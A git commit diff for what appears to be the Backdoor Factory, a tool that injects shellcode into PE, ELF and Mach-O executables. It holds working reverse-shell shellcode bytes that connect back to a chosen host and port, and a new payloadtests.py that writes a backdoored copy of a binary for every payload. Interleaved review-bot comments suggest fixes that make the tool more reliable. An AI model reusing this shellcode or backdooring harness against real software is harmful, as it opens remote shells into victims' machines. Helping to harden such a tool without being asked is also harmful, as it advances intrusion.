Commit cbd41fae authored by Mati's avatar Mati

Imported Upstream version 2.3.6

parent 996cc461
......@@ -268,6 +268,20 @@ Sample Usage:
###Changelog
####12/27/2014
Added payloadtests.py
This script will output patched files in backdoored that will allow for the user to
test the payloads as they wish. Each payload type increments the port used
by one.
```
Usage: payloadtest.py binary HOST PORT
```
####12/17/2014
OS X Beaconing Payloads for x86 and x64: beaconing_reverse_shell_tcp
......
......@@ -62,7 +62,7 @@ def signal_handler(signal, frame):
class bdfMain():
version = """\
2.3.3
2.3.5
"""
author = """\
......
......@@ -243,6 +243,8 @@ class elfbin():
This function sets the shellcode.
"""
avail_shells = []
self.bintype = False
if self.e_machine == 0x03: # x86 chipset
if self.EI_CLASS == 0x1:
......@@ -291,7 +293,8 @@ class elfbin():
continue
else:
print " {0}".format(item)
avail_shells.append(item)
self.avail_shells = avail_shells
return False
#else:
# shell_cmd = self.SHELL + "()"
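Review bot: `self.avail_shells` is assigned only at the end of the listing branch (the `self.avail_shells = avail_shells` immediately before `return False`), so a caller that reads it after a run that selected a shell, or after any other exit from this method, gets an AttributeError rather than an empty list; payloadtests.py in this commit reads it right after `run_this()`. Initialise it beside the new `self.bintype = False` at the top of the method — `self.avail_shells = []` — and append to `self.avail_shells` directly, which also removes the throwaway local list. The method starts above and ends below the two hunks shown.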
......
......@@ -10,7 +10,7 @@ git clone https://github.com/aquynh/capstone/
cd capstone
git checkout next
git checkout master
./make.sh
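Review bot: The branch switched to is still an unpinned, moving head of a third-party repository, so every install builds whatever capstone's `master` happens to be that day; for a tool that rewrites binaries this makes results non-reproducible and passes any upstream breaking change or compromise straight to users. Pin to a specific release tag or commit hash and record it in the README, e.g. `git checkout <release-tag-or-commit>` in place of `git checkout master`, and consider checking the resolved `git rev-parse HEAD` against the recorded value before `./make.sh`. The script continues beyond the hunk.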
......
......@@ -75,7 +75,7 @@ class macho_intel32_shellcode():
self.shellcode2 += "\x68"
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += "\x68\xff\x02"
self.shellcode2 += struct.pack(">h", self.PORT)
self.shellcode2 += struct.pack(">H", self.PORT)
self.shellcode2 += ("\x89\xe7\x31\xc0\x50"
"\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x62"
"\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8\x79\xf6\x68"
......@@ -117,7 +117,7 @@ class macho_intel32_shellcode():
self.shellcode2 = "\x68"
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += "\x68\xff\x02"
self.shellcode2 += struct.pack(">h", self.PORT)
self.shellcode2 += struct.pack(">H", self.PORT)
self.shellcode2 += ("\x89\xe7\x31\xc0\x50"
"\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x62"
"\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8\x79\xf6\x68"
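Review bot: With `>H` an out-of-range port (negative or above 65535) now fails inside `struct.pack` with a bare `struct.error` deep in shellcode assembly instead of at argument parsing, and the traceback does not name the option at fault. Add a range check before any packing, `if not 0 <= self.PORT <= 65535: raise ValueError("PORT must be 0-65535, got %r" % self.PORT)`, ideally once where PORT is parsed so the Mach-O x64 and Windows shellcode classes changed in this commit are covered as well. Both methods here start and end outside the hunks.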
......
......@@ -73,7 +73,7 @@ class macho_intel64_shellcode():
"\x00\x02"
)
self.shellcode2 += struct.pack(">h", self.PORT)
self.shellcode2 += struct.pack(">H", self.PORT)
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += ("\x56\x48\x89\xe6\x6a\x10\x5a\x0f"
"\x05\x4c\x89\xe7\xb8\x5a\x00\x00\x02\x48\x31\xf6\x0f\x05\xb8\x5a"
......@@ -114,7 +114,7 @@ class macho_intel64_shellcode():
"\x89\xc4\x48\x89\xc7\xb8\x62\x00\x00\x02\x48\x31\xf6\x56\x48\xbe"
"\x00\x02"
)
self.shellcode2 += struct.pack(">h", self.PORT)
self.shellcode2 += struct.pack(">H", self.PORT)
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += ("\x56\x48\x89\xe6\x6a\x10\x5a\x0f"
"\x05\x4c\x89\xe7\xb8\x5a\x00\x00\x02\x48\x31\xf6\x0f\x05\xb8\x5a"
......
......@@ -442,7 +442,7 @@ class winI32_shellcode():
"\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57"
"\x57\x57\x57\x6a\x00\x54\x68\x3a\x56\x79\xa7\xff\xd5\xeb\x5f"
"\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68")
self.shellcode2 += struct.pack("<h", self.PORT)
self.shellcode2 += struct.pack("<H", self.PORT)
self.shellcode2 += ("\x00\x00\x53"
"\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x48\x59\x31\xd2\x52\x68"
"\x00\x32\xa0\x84\x52\x52\x52\x51\x52\x50\x68\xeb\x55\x2e\x3b"
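Review bot: The `<H` (little-endian) port in this hunk differs from the `>H`/`!H` network-order form used for the Mach-O and winI64 sockaddr ports, and nothing says why, so a later reader may "harmonise" it and silently break the payload. The value is followed by `\x00\x00` to complete a 32-bit push, which looks like a host-order WORD argument rather than a network-order sockaddr field — confirm against the payload source and add a comment above the pack such as `# host-order port pushed as a dword argument (not a network-order sockaddr field)`. The same comment belongs on the `"<H"` pack in the third winI64 hunk of this commit. The method continues outside the hunk.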
......
......@@ -118,7 +118,7 @@ class winI64_shellcode():
self.shellcode2 = ("\x5d\x49\xbe\x77\x73\x32\x5f\x33"
"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00"
"\x49\x89\xe5\x49\xbc\x02\x00")
self.shellcode2 += struct.pack('!h', self.PORT)
self.shellcode2 += struct.pack('!H', self.PORT)
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += ("\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c"
......@@ -422,7 +422,7 @@ class winI64_shellcode():
#"\x1f\x90"
#"\x7f\x00\x00\x01"
)
self.shellcode2 += struct.pack('!h', self.PORT)
self.shellcode2 += struct.pack('!H', self.PORT)
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += ("\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c"
......@@ -695,7 +695,7 @@ class winI64_shellcode():
"\xc0\x4d\x31\xc9\x41\x50\x41\x50\x49\xba\x3a\x56\x79\xa7\x00"
"\x00\x00\x00\xff\xd5\xe9\x9e\x00\x00\x00\x5a\x48\x89\xc1\x49"
"\xb8")
self.shellcode2 += struct.pack("<h", self.PORT)
self.shellcode2 += struct.pack("<H", self.PORT)
self.shellcode2 += ("\x00\x00\x00\x00\x00\x00\x4d\x31\xc9\x41\x51\x41"
"\x51\x6a\x03\x41\x51\x49\xba\x57\x89\x9f\xc6\x00\x00\x00\x00"
"\xff\xd5\xeb\x7c\x48\x89\xc1\x48\x31\xd2\x41\x58\x4d\x31\xc9"
......
......@@ -111,6 +111,9 @@ class machobin():
"This function sets the shellcode."
print "[*] Looking for and setting selected shellcode"
avail_shells = []
self.bintype = False
if MagicNumber == '0xfeedface':
#x86
......@@ -149,6 +152,8 @@ class machobin():
continue
else:
print " {0}".format(item)
avail_shells.append(item)
self.avail_shells = avail_shells
return False
#else:
# shell_cmd = self.SHELL + "()"
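Review bot: As in the elfbin hunk, `self.avail_shells` is set only on the listing branch just before `return False`, so reading it after any other path through this method raises AttributeError; payloadtests.py in this commit reads `supported_file.avail_shells` directly after `run_this()`. Initialise `self.avail_shells = []` next to the new `self.bintype = False` at the top and append to it directly, dropping the local list. The method starts above and ends below the hunks shown.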
......
#!/usr/bin/env python
'''
Copyright (c) 2013-2014, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
import pebin
import machobin
import elfbin
import sys
import os
def basicDiscovery(FILE):
macho_supported = ['\xcf\xfa\xed\xfe', '\xca\xfe\xba\xbe',
'\xce\xfa\xed\xfe',
]
testBinary = open(FILE, 'rb')
header = testBinary.read(4)
testBinary.close()
if 'MZ' in header:
return 'PE'
elif 'ELF' in header:
return 'ELF'
elif header in macho_supported:
return "MACHO"
else:
'Only support ELF, PE, and MACH-O file formats'
return None
if __name__ == "__main__":
'''
Will create patched binaries for each payload for the type of binary provided.
Each payload has it's own port number.
Usage: ./testNarness.py file 127.0.0.1 8080
'''
if len(sys.argv) != 4:
print "Will create patched binaries for each stock shellcode/payload for the "
print "type of binary provided. Each payload type has it's own port number."
print "Usage:" + str(sys.argv[0]) + " binary HOST PORT"
sys.exit()
file = sys.argv[1]
host = sys.argv[2]
port = int(sys.argv[3])
outputfiles = {}
is_supported = basicDiscovery(file)
if is_supported is "PE":
patchtypes = ['APPEND', 'JUMP', 'SINGLE']
supported_file = pebin.pebin(FILE=file, OUTPUT=None, SHELL='none')
supported_file.run_this()
#print supported_file.flItms['avail_shells']
for aShell in supported_file.flItms['avail_shells']:
for patchtype in patchtypes:
if 'cave_miner' in aShell or 'user_supplied' in aShell:
continue
aName = aShell + "." + patchtype + "." + str(host) + "." + str(port) + "." + file
print "Creating File:", aName
if patchtype == 'APPEND':
supported_file = pebin.pebin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port, ADD_SECTION=True)
elif patchtype == 'JUMP':
supported_file = pebin.pebin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port, CAVE_JUMPING=True)
elif patchtype == 'SINGLE':
supported_file = pebin.pebin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port, CAVE_JUMPING=False)
result = supported_file.run_this()
outputfiles[aName] = result
port += 1
elif is_supported is "ELF":
supported_file = elfbin.elfbin(FILE=file, OUTPUT=None, SHELL='none')
supported_file.run_this()
for aShell in supported_file.avail_shells:
if 'cave_miner' in aShell or 'user_supplied' in aShell:
continue
aName = aShell + "." + str(host) + "." + str(port) + "." + file
print "Creating File:", aName
supported_file = elfbin.elfbin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port)
result = supported_file.run_this()
outputfiles[aName] = result
port += 1
elif is_supported is "MACHO":
supported_file = machobin.machobin(FILE=file, OUTPUT=None, SHELL='none')
supported_file.run_this()
for aShell in supported_file.avail_shells:
if 'cave_miner' in aShell or 'user_supplied' in aShell:
continue
aName = aShell + "." + str(host) + "." + str(port) + "." + file
print "Creating File:", aName
supported_file = machobin.machobin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port, FAT_PRIORITY='ALL')
result = supported_file.run_this()
outputfiles[aName] = result
port += 1
print "Successful files are in backdoored:"
for afile, aresult in outputfiles.iteritems():
if aresult is True:
print afile, 'Success'
else:
print afile, 'Fail'
os.remove('backdoored/' + afile)
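Review bot: The dispatch on the detected format uses identity comparison with string literals — `if is_supported is "PE":`, `elif is_supported is "ELF":`, `elif is_supported is "MACHO":` — which only works because CPython happens to intern those literals; change all three to `==`. Two smaller things in the same file: the message `'Only support ELF, PE, and MACH-O file formats'` in basicDiscovery is a bare expression statement and is never printed, and the cleanup `os.remove('backdoored/' + afile)` will raise OSError and abort the loop if a failed run never wrote its output file, so guard it with `try/except OSError` or an `os.path.exists` check. Also note that `aName` embeds the `file` argument verbatim, so an input given with directory components yields an output name containing slashes under `backdoored/`.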
......@@ -627,6 +627,9 @@ class pebin():
print "[*] Cave {0} length as int: {1}".format(k + 1, item)
print "[*] Available caves: "
if pickACave == {}:
print "[!!!!] No caves available! Use 'j' for cave jumping or"
print "[!!!!] 'i' for ignore."
for ref, details in pickACave.iteritems():
if details[3] >= item:
print str(ref) + ".", ("Section Name: {0}; Section Begin: {4} "
......@@ -907,6 +910,8 @@ class pebin():
"""
print "[*] Looking for and setting selected shellcode"
avail_shells = []
if self.flItms['Magic'] == int('10B', 16):
self.flItms['bintype'] = winI32_shellcode
if self.flItms['Magic'] == int('20B', 16):
......@@ -936,7 +941,8 @@ class pebin():
continue
else:
print " {0}".format(item)
avail_shells.append(item)
self.flItms['avail_shells'] = avail_shells
return False
#else:
# shell_cmd = self.SHELL + "()"
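Review bot: The available-shell list is exposed as `self.flItms['avail_shells']` here but as `self.avail_shells` in the elfbin and machobin hunks of the same commit, and payloadtests.py has to special-case the PE branch for that reason; expose `self.avail_shells` here as well (keeping the dict key if other code reads it) so callers have one interface. As in the other two classes, the key is only set on the listing branch before `return False`, so `flItms['avail_shells']` raises KeyError on any other path — seed it with `[]` at the top next to `avail_shells = []`. In the first hunk the `No caves available!` warning is printed but the method then falls through into the loop over the empty dict; confirm a later check stops the patch rather than continuing without a cave. All three methods start and end outside the hunks.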
......
......@@ -9,9 +9,10 @@ fi
cd capstone
if [[ `git pull` != "Already up-to-date." ]]; then
git checkout next
git checkout master
./make.sh
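Review bot: The new `git checkout master` runs only when `git pull`'s output differs from the literal `Already up-to-date.`, and that phrase depends on the git version (newer releases print `Already up to date.`), so whether the rebuild happens is decided by a message string rather than repository state. Compare the commit before and after the pull instead, e.g. `before=$(git rev-parse HEAD); git pull; if [[ $(git rev-parse HEAD) != "$before" ]]; then`, and, as with the install script, pin to a release tag or commit rather than tracking `master`. The `if` block and the script continue outside the hunk.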
......